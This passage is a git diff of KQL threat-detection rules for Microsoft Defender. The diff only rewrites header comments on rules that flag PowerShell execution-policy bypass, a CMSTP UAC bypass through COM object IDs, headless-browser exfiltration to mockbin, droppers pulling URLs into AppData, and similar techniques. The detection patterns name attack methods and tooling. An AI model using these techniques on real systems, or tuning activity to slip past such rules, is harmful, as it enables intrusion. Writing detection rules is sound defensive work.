-// Date: 2022-02-11
-// Level: medium
-// Description: Detects the usage of the unsafe bpftrace option
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.004
-// False Positives:
-// - Legitimate usage of the unsafe option
-
-DeviceProcessEvents
+// Title: BPFtrace Unsafe Option Usage
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2022-02-11
+// Level: medium
+// Description: Detects the usage of the unsafe bpftrace option
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004
+// False Positives:
+// - Legitimate usage of the unsafe option
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "--unsafe" and FolderPath endswith "bpftrace"
\ No newline at end of file
diff --git a/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql b/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql
index cc1de169..9c770818 100644
--- a/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql
+++ b/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql
@@ -1,10 +1,10 @@
-// Title: Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-05
-// Level: high
-// Description: Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Appdata\\Local\\Temp\\") and (ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/capsh_shell_invocation_linux.kql b/KQL/rules/Execution/capsh_shell_invocation_linux.kql
index 57c666f5..9dff2a13 100644
--- a/KQL/rules/Execution/capsh_shell_invocation_linux.kql
+++ b/KQL/rules/Execution/capsh_shell_invocation_linux.kql
@@ -1,10 +1,10 @@
-// Title: Capsh Shell Invocation - Linux
-// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
-// Date: 2024-09-02
-// Level: high
-// Description: Detects the use of the "capsh" utility to invoke a shell.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Capsh Shell Invocation - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "capsh" utility to invoke a shell.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where ProcessCommandLine endswith " --" and FolderPath endswith "/capsh"
\ No newline at end of file
diff --git a/KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql b/KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql
index 59879370..2e574132 100644
--- a/KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql
+++ b/KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql
@@ -1,12 +1,12 @@
-// Title: Change PowerShell Policies to an Insecure Level
-// Author: frack113
-// Date: 2021-11-01
-// Level: medium
-// Description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-// False Positives:
-// - Administrator scripts
-
-DeviceProcessEvents
+// Title: Change PowerShell Policies to an Insecure Level
+// Author: frack113
+// Date: 2021-11-01
+// Level: medium
+// Description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Administrator scripts
+
+DeviceProcessEvents
 | where (((ProcessVersionInfoOriginalFileName in~ ("powershell_ise.exe", "PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "Unrestricted") and (ProcessCommandLine contains "-executionpolicy " or ProcessCommandLine contains " -ep " or ProcessCommandLine contains " -exec ")) and (not(((ProcessCommandLine contains "-NoProfile -ExecutionPolicy Bypass -File \"C:\\Program Files\\PowerShell\\7\\" or ProcessCommandLine contains "-NoProfile -ExecutionPolicy Bypass -File \"C:\\Program Files (x86)\\PowerShell\\7\\") and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe"))))) and (not(((ProcessCommandLine contains "-ExecutionPolicy ByPass -File \"C:\\Program Files\\Avast Software\\Avast" or ProcessCommandLine contains "-ExecutionPolicy ByPass -File \"C:\\Program Files (x86)\\Avast Software\\Avast\\") and (InitiatingProcessFolderPath contains "C:\\Program Files\\Avast Software\\Avast\\" or InitiatingProcessFolderPath contains 
"C:\\Program Files (x86)\\Avast Software\\Avast\\" or InitiatingProcessFolderPath contains "\\instup.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql b/KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql
index b69a82b1..6d2ad8c8 100644
--- a/KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql
+++ b/KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql
@@ -1,10 +1,10 @@
-// Title: Chromium Browser Headless Execution To Mockbin Like Site
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-09-11
-// Level: high
-// Description: Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Chromium Browser Headless Execution To Mockbin Like Site
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-09-11
+// Level: high
+// Description: Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "--headless" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (ProcessCommandLine contains "://run.mocky" or ProcessCommandLine contains "://mockbin")
\ No newline at end of file
diff --git a/KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql b/KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql
index 60294be8..8f3be24d 100644
--- a/KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql
+++ b/KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql
@@ -1,10 +1,10 @@
-// Title: Clfs.SYS Loaded By Process Located In a Potential Suspicious Location
-// Author: X__Junior
-// Date: 2025-01-20
-// Level: medium
-// Description: Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVEs exploits that targets Common Log File.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceImageLoadEvents
+// Title: Clfs.SYS Loaded By Process Located In a Potential Suspicious Location
+// Author: X__Junior
+// Date: 2025-01-20
+// Level: medium
+// Description: Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVEs exploits that targets Common Log File.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\clfs.sys" and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql b/KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql
index a592813f..8168f9fc 100644
--- a/KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql
+++ b/KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql
@@ -1,10 +1,10 @@
-// Title: CLR DLL Loaded Via Office Applications
-// Author: Antonlovesdnb
-// Date: 2020-02-19
-// Level: medium
-// Description: Detects CLR DLL being loaded by an Office Product
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.002
-
-DeviceImageLoadEvents
+// Title: CLR DLL Loaded Via Office Applications
+// Author: Antonlovesdnb
+// Date: 2020-02-19
+// Level: medium
+// Description: Detects CLR DLL being loaded by an Office Product
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+
+DeviceImageLoadEvents
 | where FolderPath contains "\\clr.dll" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql b/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql
index 543d04a8..98de6b57 100644
--- a/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql
+++ b/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql
@@ -1,11 +1,11 @@
-// Title: Cmd.EXE Missing Space Characters Execution Anomaly
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-08-23
-// Level: high
-// Description: Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.
-// This could be a sign of obfuscation of a fat finger problem (typo by the developer).
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Cmd.EXE Missing Space Characters Execution Anomaly
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-23
+// Level: high
+// Description: Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.
+// This could be a sign of obfuscation of a fat finger problem (typo by the developer).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "cmd.exe/c" or ProcessCommandLine contains "\\cmd/c" or ProcessCommandLine contains "\"cmd/c" or ProcessCommandLine contains "cmd.exe/k" or ProcessCommandLine contains "\\cmd/k" or ProcessCommandLine contains "\"cmd/k" or ProcessCommandLine contains "cmd.exe/r" or ProcessCommandLine contains "\\cmd/r" or ProcessCommandLine contains "\"cmd/r") or (ProcessCommandLine contains "/cwhoami" or ProcessCommandLine contains "/cpowershell" or ProcessCommandLine contains "/cschtasks" or ProcessCommandLine contains "/cbitsadmin" or ProcessCommandLine contains "/ccertutil" or ProcessCommandLine contains "/kwhoami" or ProcessCommandLine contains "/kpowershell" or ProcessCommandLine contains "/kschtasks" or ProcessCommandLine contains "/kbitsadmin" or ProcessCommandLine contains "/kcertutil") or (ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd.exe /r" or 
ProcessCommandLine contains "cmd /r")) and (not(((ProcessCommandLine in~ ("cmd.exe /c") or ProcessCommandLine contains "AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\node_modules" or ProcessCommandLine endswith "cmd.exe/c .") or (ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /r "))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql b/KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql
index 5f2d0335..4747747d 100644
--- a/KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql
+++ b/KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql
@@ -1,12 +1,12 @@
-// Title: CMSTP UAC Bypass via COM Object Access
-// Author: Nik Seetharaman, Christian Burkard (Nextron Systems)
-// Date: 2019-07-31
-// Level: high
-// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001
-// False Positives:
-// - Legitimate CMSTP use (unlikely in modern enterprise environments)
-
-DeviceProcessEvents
+// Title: CMSTP UAC Bypass via COM Object Access
+// Author: Nik Seetharaman, Christian Burkard (Nextron Systems)
+// Date: 2019-07-31
+// Level: high
+// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001
+// False Positives:
+// - Legitimate CMSTP use (unlikely in modern enterprise environments)
+
+DeviceProcessEvents
 | where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql b/KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql
index dbf199d3..336fc214 100644
--- a/KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql
+++ b/KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql
@@ -1,12 +1,12 @@
-// Title: Command Line Execution with Suspicious URL and AppData Strings
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2019-01-16
-// Level: medium
-// Description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.command-and-control, attack.t1059.003, attack.t1059.001, attack.t1105
-// False Positives:
-// - High
-
-DeviceProcessEvents
+// Title: Command Line Execution with Suspicious URL and AppData Strings
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.command-and-control, attack.t1059.003, attack.t1059.001, attack.t1105
+// False Positives:
+// - High
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "http" and ProcessCommandLine contains "://" and ProcessCommandLine contains "%AppData%") and FolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql b/KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql
index 0683ba40..0a39ead9 100644
--- a/KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql
+++ b/KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql
@@ -1,10 +1,10 @@
-// Title: Computer Password Change Via Ksetup.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-06
-// Level: medium
-// Description: Detects password change for the computer's domain account or host principal via "ksetup.exe"
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Computer Password Change Via Ksetup.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-06
+// Level: medium
+// Description: Detects password change for the computer's domain account or host principal via "ksetup.exe"
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " /setcomputerpassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql b/KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql
index ab3422d1..157399cb 100644
--- a/KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql
+++ b/KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql
@@ -1,12 +1,12 @@
-// Title: Conhost.exe CommandLine Path Traversal
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-14
-// Level: high
-// Description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.003
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Conhost.exe CommandLine Path Traversal
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-14
+// Level: high
+// Description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "/../../" and InitiatingProcessCommandLine contains "conhost"
\ No newline at end of file
diff --git a/KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql b/KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql
index 912ec61c..759237ba 100644
--- a/KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql
+++ b/KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql
@@ -1,10 +1,10 @@
-// Title: Conhost Spawned By Uncommon Parent Process
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022-09-28
-// Level: medium
-// Description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Conhost Spawned By Uncommon Parent Process
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-28
+// Level: medium
+// Description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\conhost.exe" and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\userinit.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe")) and (not((InitiatingProcessCommandLine contains "-k apphost -s AppHostSvc" or InitiatingProcessCommandLine contains "-k imgsvc" or InitiatingProcessCommandLine contains "-k localService -p -s RemoteRegistry" or InitiatingProcessCommandLine contains "-k LocalSystemNetworkRestricted -p -s NgcSvc" or InitiatingProcessCommandLine contains "-k NetSvcs -p -s NcaSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s NetSetupSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s wlidsvc" or 
InitiatingProcessCommandLine contains "-k NetworkService -p -s DoSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s AppXSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s ClipSVC" or InitiatingProcessCommandLine contains "-k wusvcs -p -s WaaSMedicSvc"))) and (not((InitiatingProcessCommandLine contains "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessCommandLine contains "C:\\Program Files\\Dropbox\\Client\\")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql b/KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql
index 1fab717d..ad7a5ef6 100644
--- a/KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql
+++ b/KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql
@@ -1,10 +1,10 @@
-// Title: Csc.EXE Execution Form Potentially Suspicious Parent
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2019-02-11
-// Level: high
-// Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.005, attack.t1059.007, attack.defense-evasion, attack.t1218.005, attack.t1027.004
-
-DeviceProcessEvents
+// Title: Csc.EXE Execution Form Potentially Suspicious Parent
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2019-02-11
+// Level: high
+// Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007, attack.defense-evasion, attack.t1218.005, attack.t1027.004
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\csc.exe" or ProcessVersionInfoOriginalFileName =~ "csc.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "-Encoded " or InitiatingProcessCommandLine contains "FromBase64String") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) or (InitiatingProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$" or (InitiatingProcessCommandLine 
contains ":\\PerfLogs\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Pictures\\"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or InitiatingProcessFolderPath =~ "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql b/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql
index b8560c6d..69b37b3c 100644
--- a/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql
+++ b/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql
@@ -1,13 +1,13 @@
-// Title: Cscript/Wscript Potentially Suspicious Child Process
-// Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86')
-// Date: 2023-05-15
-// Level: medium
-// Description: Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32.
-// Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly.
-
-DeviceProcessEvents
+// Title: Cscript/Wscript Potentially Suspicious Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86')
+// Date: 2023-05-15
+// Level: medium
+// Description: Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32.
+// Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly.
+
+DeviceProcessEvents
 | where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (FolderPath endswith "\\rundll32.exe" or ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and ((ProcessCommandLine contains "mshta" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "msiexec")))) and (not(((ProcessCommandLine contains "UpdatePerUserSystemParameters" or ProcessCommandLine contains "PrintUIEntry" or ProcessCommandLine contains "ClearMyTracksByProcess") and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql b/KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql
index f7954e93..c0eb9fa8 100644
--- a/KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql
+++ b/KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql
@@ -1,10 +1,10 @@
-// Title: Cscript/Wscript Uncommon Script Extension Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-15
-// Level: high
-// Description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.005, attack.t1059.007
-
-DeviceProcessEvents
+// Title: Cscript/Wscript Uncommon Script Extension Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007
+
+DeviceProcessEvents
